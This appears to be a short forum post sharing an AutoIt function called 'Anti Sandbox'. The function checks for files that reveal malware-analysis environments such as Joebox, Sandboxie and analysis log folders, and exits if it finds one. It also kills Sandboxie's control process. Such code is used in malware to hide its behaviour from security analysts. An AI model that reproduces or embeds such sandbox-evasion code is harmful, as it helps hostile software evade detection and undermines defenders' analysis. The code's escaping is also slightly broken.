13 Years of Service
24%
Anti Sandbox in AutoIT
Code:
>
;# $antisand = 1 Active
Func _antisand($antisand)
If $antisand = 1 Then
If FileExists("C:\\sample.exe\") Then
Exit
EndIf
If FileExists(\"C:\\joebox\\joeboxserver\\test.exe\") Then
Exit
EndIf
If FileExists(\"C:\\analysis\\log\") Then
Exit
EndIf
If FileExists(\"C:\\Sandbox\\DONT_USE.TXT\") Then
Exit
EndIf
ProcessClose(\"SbieCtrl.exe\")
EndIf
EndFunc